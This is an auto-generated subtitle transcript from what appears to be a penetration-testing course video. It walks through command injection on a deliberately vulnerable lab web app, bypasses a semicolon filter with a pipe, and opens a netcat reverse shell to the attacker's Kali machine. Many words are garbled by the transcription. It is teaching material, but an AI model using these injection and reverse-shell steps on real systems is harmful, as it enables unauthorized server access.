1
00:00:02,710 --> 00:00:09,490
Okay now that we managed to execute with commands on the server using the low security settings.

2
00:00:09,580 --> 00:00:15,630
Let's see if we can set it up to medium and if we can do the same after increasing security.

3
00:00:16,030 --> 00:00:21,970
So we cover the basic case and now I'm going to go to security and I'm going to send said the security

4
00:00:21,970 --> 00:00:23,390
level to medium.

5
00:00:23,530 --> 00:00:29,920
I'm going to submit this then we're going to go back to our command execution and I'm going to end with

6
00:00:29,920 --> 00:00:30,530
my IP.

7
00:00:30,530 --> 00:00:33,970
Now I just want to note that my IP is different now.

8
00:00:34,100 --> 00:00:41,390
If you notice that the IP of the server right now is 2 0 9 and my machine I used to identify with Conficker

9
00:00:44,340 --> 00:00:47,910
you can see that the IP of my candy machine is true.

10
00:00:48,290 --> 00:00:50,530
So again I'm going to try to pin the Callimachi.

11
00:00:50,540 --> 00:00:53,980
Let's just first see if we can fix something.

12
00:00:53,990 --> 00:00:56,280
So we're assuming that we don't know at this website.

13
00:00:56,420 --> 00:01:01,540
And again this is going from a black box point of view so we're not going to look at the source code.

14
00:01:02,360 --> 00:01:07,040
So we're just going to run this website still is going to pink stuff for us.

15
00:01:07,130 --> 00:01:11,390
So I'm just going to put the IP of the Calientes if the big works.

16
00:01:11,540 --> 00:01:17,110
So we're just going to put 10.

17
00:01:17,180 --> 00:01:19,730
As you can see now the ping command is working.

18
00:01:19,970 --> 00:01:26,240
Now let's see and try to do what we did before so we used to do with the IP.

19
00:01:26,360 --> 00:01:34,130
And then you use the semicolon to say that run this command and this command and in the low security

20
00:01:34,130 --> 00:01:36,350
settings this used to work for us.

21
00:01:36,440 --> 00:01:42,140
So we're going to submit this and at the bottom it should show us our current working directory because

22
00:01:42,140 --> 00:01:44,110
we have the PWT here.

23
00:01:44,390 --> 00:01:47,420
So I'm submitting this.

24
00:01:47,630 --> 00:01:52,640
And as you can see nothing got executed so not even the pin command got executed.

25
00:01:53,020 --> 00:01:58,780
So again looking from a black box point of view we're going to think oh maybe they're using some sort

26
00:01:58,780 --> 00:02:00,500
of filtering on the semicolon.

27
00:02:00,640 --> 00:02:07,330
So they're checking if the command contains a semicolon then they're going to ignore that command and

28
00:02:07,360 --> 00:02:08,500
not run it.

29
00:02:08,530 --> 00:02:13,110
So we're just going to try to use another trick or something similar to the semicolon.

30
00:02:13,300 --> 00:02:17,460
So what we used to do before we had an example of doing ls.

31
00:02:17,710 --> 00:02:20,240
So that's the last command and.

32
00:02:20,590 --> 00:02:27,960
The PWT is what shows the working directory and we can combine these two by two and Elvira's so called

33
00:02:28,000 --> 00:02:28,270
on.

34
00:02:28,280 --> 00:02:37,530
And then we do the APBT and that will do both it'll do the allies and the PWT so that we used to work

35
00:02:37,530 --> 00:02:43,950
for us doesn't work anymore because they're probably filtering based on this specific character.

36
00:02:43,950 --> 00:02:50,520
So we're going to do is we're going to use something else available for us and the Unix commands which

37
00:02:50,520 --> 00:02:51,760
is the pipe.

38
00:02:51,990 --> 00:02:55,830
So I think is really useful when it comes to Unix you'll use it a lot.

39
00:02:55,830 --> 00:03:00,040
What it basically does it me is run the first command.

40
00:03:00,630 --> 00:03:07,230
And once you run that command center the outputs or pipe the output to this command and run the second

41
00:03:07,230 --> 00:03:08,340
command on it.

42
00:03:09,260 --> 00:03:11,450
So essentially it's one two commands.

43
00:03:11,450 --> 00:03:17,240
In our case now you can use pi for a lot of things and it's used into rejects and things like that for

44
00:03:17,240 --> 00:03:22,830
us all we want to do is we're interested into getting the second command to run.

45
00:03:22,880 --> 00:03:25,390
So let's have an example of this.

46
00:03:25,510 --> 00:03:32,490
So we're going to do ls which is going to be similar to our ping and then we're going to put the five

47
00:03:32,490 --> 00:03:39,180
character which is the vertical bar and then we're going to put the second come out that the LS output

48
00:03:39,330 --> 00:03:40,600
should be passed to.

49
00:03:40,680 --> 00:03:44,520
Now PWT doesn't expect any input to be passed to it.

50
00:03:44,580 --> 00:03:50,700
So at the moment when we run this it's all basically run both but it won't show you the result of running

51
00:03:50,730 --> 00:03:51,270
ls.

52
00:03:51,300 --> 00:03:55,860
It all feeds to PWT and should be the result of PWT.

53
00:03:55,860 --> 00:04:04,370
So when I hit enter you will see that PWT you got executed so in our example what's happened is we have

54
00:04:04,370 --> 00:04:09,070
a ping then we're It was an hour eyepiece so we're going to put our IP

55
00:04:12,120 --> 00:04:17,280
and then we're going to use debark character and we're going to put the second command that we want

56
00:04:17,280 --> 00:04:20,580
to run which will be the command that will give us shell on the server.

57
00:04:20,580 --> 00:04:23,460
But for further testing we're just going to do OPW.

58
00:04:23,640 --> 00:04:26,690
And again as you can see we don't see the results of the ping.

59
00:04:26,820 --> 00:04:33,420
We only see the result of the PWT because again for the third time this command will run this and feed

60
00:04:33,420 --> 00:04:36,820
the output to PWT.

61
00:04:36,820 --> 00:04:39,850
So let's try this in here so we're going to do.

62
00:04:40,140 --> 00:04:47,010
We put our feet again like we did before and we used to put them already like that but I'm just going

63
00:04:47,010 --> 00:04:51,660
to put my bar character and enter

64
00:04:54,710 --> 00:05:01,200
as you can see the second command got executed and we got our current working directory.

65
00:05:01,210 --> 00:05:05,870
Now we can modify this to get a show on our computer.

66
00:05:05,890 --> 00:05:11,550
So again we're going to use the bar and we're going to get it to you.

67
00:05:11,560 --> 00:05:18,220
We're going to use the exact same method that we used last time so we're going to do a C minus the and

68
00:05:18,260 --> 00:05:28,770
with my IP and then I'm going to put the port which is 88 you now before I execute this I'm going to

69
00:05:28,800 --> 00:05:33,570
listen on port AT&amp;T for a connection here and we're going to use the same command like before using

70
00:05:33,600 --> 00:05:34,300
them.

71
00:05:34,710 --> 00:05:42,790
So and see the LP 88 This is listening.

72
00:05:43,010 --> 00:05:49,370
And we're going to connect back from here to the Kalli hit submit and sure enough we get a connection

73
00:05:49,370 --> 00:05:54,420
here that allow us to run any commands we want on the server so we can do that.

74
00:05:54,530 --> 00:06:02,060
Now we can list the files we can get our I.D. or do anything we want on the current server.

75
00:06:02,060 --> 00:06:05,270
So we basically managed to gain access to that Web site.